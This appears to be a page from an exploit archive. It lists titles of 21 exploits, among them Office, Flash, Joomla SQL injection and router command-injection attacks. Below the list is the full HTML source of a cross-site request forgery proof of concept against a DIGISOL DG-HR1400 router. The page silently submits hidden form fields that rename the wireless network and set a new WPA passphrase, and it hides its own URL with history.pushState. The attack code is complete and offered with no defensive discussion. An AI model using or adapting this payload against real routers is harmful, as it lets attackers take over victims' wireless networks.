
21 new exploits Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check Adobe Flash - MP4 AMF Parsing Overflow Adobe Flash - SWF Stack Corruption Adobe Flash - Use-After-Free in Applying Bitmap Filter Adobe Flash - YUVPlane Decoding Heap Overflow DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection Joomla! Component Eventix Events Calendar 1.0 - SQL Injection Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' Parameter SQL Injection Joomla! Component Directorix Directory Manager 1.1.1 - SQL Injection Joomla! Component Magic Deals Web 1.2.0 - SQL Injection Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit) Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit) Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit) Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit) AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)
33 lines
1.7 KiB
HTML
Executable file
33 lines
1.7 KiB
HTML
Executable file
<html>
|
|
Digisol Router CSRF Exploit - Indrajith A.N
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
|
|
<input type="hidden" name="mode" value="0" />
|
|
<input type="hidden" name="apssid" value="hacked" />
|
|
<input type="hidden" name="startScanUplinkAp" value="0" />
|
|
<input type="hidden" name="domain" value="1" />
|
|
<input type="hidden" name="hiddenSSID" value="on" />
|
|
<input type="hidden" name="ssid" value="hacked" />
|
|
<input type="hidden" name="band" value="10" />
|
|
<input type="hidden" name="chan" value="6" />
|
|
<input type="hidden" name="chanwid" value="1" />
|
|
<input type="hidden" name="txRate" value="0" />
|
|
<input type="hidden" name="method_cur" value="6" />
|
|
<input type="hidden" name="method" value="6" />
|
|
<input type="hidden" name="authType" value="2" />
|
|
<input type="hidden" name="length" value="1" />
|
|
<input type="hidden" name="format" value="2" />
|
|
<input type="hidden" name="defaultTxKeyId" value="1" />
|
|
<input type="hidden" name="key1" value="0000000000" />
|
|
<input type="hidden" name="pskFormat" value="0" />
|
|
<input type="hidden" name="pskValue" value="csrf1234" />
|
|
<input type="hidden" name="checkWPS2" value="1" />
|
|
<input type="hidden" name="save" value="Apply" />
|
|
<input type="hidden" name="basicrates" value="15" />
|
|
<input type="hidden" name="operrates" value="4095" />
|
|
<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|